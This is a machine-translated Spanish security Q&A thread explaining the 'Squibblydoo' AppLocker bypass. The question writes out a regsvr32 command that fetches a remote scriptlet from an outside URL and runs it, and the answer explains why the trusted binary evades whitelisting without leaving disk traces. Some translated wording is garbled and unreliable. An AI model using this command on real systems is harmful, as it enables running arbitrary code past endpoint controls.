¿Cómo funciona este bypass de AppLocker exactamente? ("Squibblydoo")

Question

¿Cómo funciona este bypass de AppLocker exactamente? ("Squibblydoo")

#1 de McMatty (4 votos)

4

He leído en algunos blogs acerca de un truco llamado "Squibblydoo", donde el siguiente comando puede omitir el Windows AppLocker:

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Donde la URL apunta a un archivo de secuencia de comandos que contiene un comando para abrir Powershell (que, en el escenario, está bloqueado por AppLocker).

Sin embargo, lo probé en una máquina Win10 y no funcionó. Además, estoy confundido en cuanto a lo que esto hace exactamente. Lo único que sé es que está llamando a DllUninstall desde un archivo en un servidor (pero que también podría ser un archivo local) y registra scrobj.dll (pero realmente no entiendo la relación aquí. ¿Qué es scrobj.dll ? ¿haciendo exactamente?) y eso por alguna razón hace que se ejecute el script en el archivo, que luego puede abrir una aplicación bloqueada por AppLocker.

windows blacklist

pregunta Lucas Cioffi 05.04.2018 - 20:54

fuente

1 respuesta

Lea otras preguntas en las etiquetas windows blacklist

Mitigación del software para Specter v2 aWallet Password Manager

score 4 · Answer 1

Regsvr32 es un binario confiable de Microsoft.

El regsvr32 es una utilidad de línea de comandos de Windows que se usa para registrar y anular el registro de archivos .dll y controles ActiveX en el registro. Casey Smith descubrió que es posible eludir las reglas de script de AppLocker llamando a la utilidad regsrv32 para ejecutar un comando o código arbitrario a través de archivos .sct. Esta utilidad tiene muchos beneficios ya que es un binario confiable de Microsoft, compatible con proxy, que admite el cifrado TLS, sigue las redirecciones y no deja ningún rastro en el disco.

Por lo tanto, es un Applocker binario de Microsoft firmado que le permite ejecutarse. El código en el archivo SCT (creo que esto no tiene que ser un SCT) se ejecuta cuando anulas el registro usando scrobj.dll

Scrobj.dll se utiliza para registrar y anular el registro de objetos COM, que es lo que se requiere para desencadenar esto, ya que la SCT es un dolet de servlet de objetos COM.